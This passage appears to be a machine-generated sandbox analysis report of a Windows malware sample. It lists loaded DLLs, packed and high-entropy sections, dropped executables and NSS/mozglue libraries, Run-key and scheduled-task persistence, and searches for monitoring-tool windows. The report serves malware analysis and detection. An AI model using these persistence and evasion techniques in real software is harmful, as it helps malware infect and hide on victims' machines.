Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: winmm.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: wldp.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: propsys.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: profapi.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: edputil.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: slc.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: userenv.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: sppc.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: mpr.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: gdi32.pdb source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: msasn1.pdb source: firefox.exe, 00000021.00000003.3397835645.00000169CD8A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xWindows.Security.Integrity.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nsi.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: firefox.exe, 00000021.00000003.3413206321.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xOneCoreUAPCommonProxyStub.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: UxTheme.pdb@ source: firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: winrnr.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: imm32.pdb source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413206321.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Unpacked PE file: 6.2.RoamingBKJEGDGIJE.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;legihfsp:EW;iwukfltx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;legihfsp:EW;iwukfltx:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Unpacked PE file: 9.2.RoamingIJEGDBGDBF.exe.60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 14.2.explorti.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 15.2.explorti.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 19.2.axplong.exe.820000.0.unpack :EW;.rsrc:W;.idata :W; :EW;legihfsp:EW;iwukfltx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;legihfsp:EW;iwukfltx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 20.2.7ca32398cd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 37.2.7ca32398cd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 20.2.7ca32398cd.exe.400000.0.unpack
Source: C:\Users\user\1000003002\5aa32fec17.exe Unpacked PE file: 23.2.5aa32fec17.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 37.2.7ca32398cd.exe.400000.0.unpack
Source: Yara match File source: 23.0.5aa32fec17.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.5aa32fec17.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\1000003002\5aa32fec17.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe, type: DROPPED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: real checksum: 0x1db40a should be: 0x1e3eb5
Source: axplong.exe.6.dr Static PE information: real checksum: 0x1db40a should be: 0x1e3eb5
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1db40a should be: 0x1e3eb5
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: real checksum: 0x1dbc9d should be: 0x1e053f
Source: 5aa32fec17.exe.18.dr Static PE information: real checksum: 0x0 should be: 0x19435
Source: explorti.exe.9.dr Static PE information: real checksum: 0x1dbc9d should be: 0x1e053f
Source: random[1].exe0.18.dr Static PE information: real checksum: 0x0 should be: 0x19435
Source: enter[1].exe.0.dr Static PE information: real checksum: 0x1dbc9d should be: 0x1e053f
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: legihfsp
Source: random[1].exe.0.dr Static PE information: section name: iwukfltx
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name:
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: .idata
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name:
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: legihfsp
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: iwukfltx
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: .taggant
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: yaomedmc
Source: enter[1].exe.0.dr Static PE information: section name: ihlphrnj
Source: enter[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name:
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name:
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: yaomedmc
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: ihlphrnj
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: .taggant
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: .idata
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: legihfsp
Source: axplong.exe.6.dr Static PE information: section name: iwukfltx
Source: axplong.exe.6.dr Static PE information: section name: .taggant
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: .idata
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: yaomedmc
Source: explorti.exe.9.dr Static PE information: section name: ihlphrnj
Source: explorti.exe.9.dr Static PE information: section name: .taggant
Source: random[1].exe0.18.dr Static PE information: section name: .code
Source: 5aa32fec17.exe.18.dr Static PE information: section name: .code
Source: gmpopenh264.dll.tmp.33.dr Static PE information: section name: .rodata
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6B536 push ecx; ret 0_2_6CB6B549
Source: file.exe Static PE information: section name: .text entropy: 7.823583257358654
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.97553764385012
Source: random[1].exe.0.dr Static PE information: section name: legihfsp entropy: 7.953386179247648
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: entropy: 7.97553764385012
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: legihfsp entropy: 7.953386179247648
Source: enter[1].exe.0.dr Static PE information: section name: entropy: 7.9835064162200045
Source: enter[1].exe.0.dr Static PE information: section name: yaomedmc entropy: 7.95396195458321
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: entropy: 7.9835064162200045
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: yaomedmc entropy: 7.95396195458321
Source: axplong.exe.6.dr Static PE information: section name: entropy: 7.97553764385012
Source: axplong.exe.6.dr Static PE information: section name: legihfsp entropy: 7.953386179247648
Source: explorti.exe.9.dr Static PE information: section name: entropy: 7.9835064162200045
Source: explorti.exe.9.dr Static PE information: section name: yaomedmc entropy: 7.95396195458321
Source: random[1].exe.18.dr Static PE information: section name: .text entropy: 7.823583257358654
Source: 7ca32398cd.exe.18.dr Static PE information: section name: .text entropy: 7.823583257358654
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\1000003002\5aa32fec17.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\enter[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7ca32398cd.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5aa32fec17.exe
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,